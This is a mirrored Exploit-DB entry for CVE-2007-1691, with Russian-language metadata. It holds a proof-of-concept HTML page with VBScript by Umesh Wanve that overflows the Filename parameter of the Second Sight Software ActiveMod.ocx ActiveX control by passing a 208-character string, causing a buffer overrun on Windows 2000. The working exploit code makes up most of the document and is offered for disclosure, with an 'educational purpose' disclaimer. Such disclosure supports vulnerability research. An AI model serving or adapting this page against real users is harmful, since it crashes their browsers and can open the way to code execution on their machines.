- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3789
- Проверка EDB
-
- Пройдено
- Автор
- UMESH WANVE
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2007-1691
- Дата публикации
- 2007-04-24
HTML:
<!--
===============================================================================================
Second Sight Software ActiveMod.ocx ActiveX Buffer Overflow POC
By Umesh Wanve
==============================================================================================
Date : 24-04-2007
Tested on Windows 2000 SP4 Server English
Windows 2000 SP4 Professional English
Reference: https://www.securityfocus.com/bid/23554
Vendor: http://www.freetoolsassociation.com
http://www.freetoolsassociation.com/fta/activegs/activemod.cab
Desc: The filename parameter of CLSID 2078D6EC-693C-4FB2-AE7B-A6B8D2BC4DC8 is vulnerable. This activex gives error like,
Buffer Overrun detected. This is complied with /GS flag.
PS. This was written for educational purpose. Use it at your own risk.Author will be not be
responsible for any damage.
Always thanks to Metasploit and Stroke.
-->
<html>
<title>
Second Sight Software ActiveMod.ocx ActiveX Buffer Overflow POC - By Umesh Wanve
</title>
<body>
<OBJECT id="target" WIDTH=445 HEIGHT=40 classid="clsid:2078D6EC-693C-4FB2-AE7B-A6B8D2BC4DC8" > </OBJECT>
<script language="vbscript">
targetFile = "C:\Research\activemod\ActiveMod.ocx"
prototype = "Invoke_Unknown Filename As String"
memberName = "Filename"
progid = "ActiveModLib.ActiveMod"
argCount = 1
arg1=String(208, "A")
target.Filename = arg1
</script>
</body>
</html>
# milw0rm.com [2007-04-24]
- Источник
- www.exploit-db.com